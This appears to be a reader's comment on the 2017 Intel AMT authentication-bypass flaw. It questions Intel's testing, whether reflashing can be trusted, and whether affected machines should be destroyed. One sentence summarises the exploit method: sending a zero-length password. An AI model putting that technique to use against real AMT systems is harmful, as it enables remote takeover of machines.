There's a good summary about 3/4 way down the page.
https://arstechnica.com/security/2017/05/the-hijacking-flaw-that-lurked-in-i...
Just write a simple C/Python/Perl/Go program that sends a 0 length password, done.
This certainly seems to show there was no fuzzing or even simple testing of the http server in AMT. Is it possible they ONLY ever tested the login dialog by hand, with a web browser? It seems so. Yeeesh!
I thought the whole reflash path of AMT was to ask it to reflash itself. Is that incorrect? If correct, and the AMT has been exploited via this path, can we really trust any reflash operation? Any thoughts on this from anyone who knows?
I was involved in some USG issues around the time of Y2K and at least one agency shredded every non-Y2K-compliant system they had. Would that make sense for systems with this AMT vulnerability? Just assume the worst and destroy them?
I am long past believing one can build secure platforms on any x86 chipset. This mess only strengthens that conviction. But there are some great RISC-V announcements this week!
ron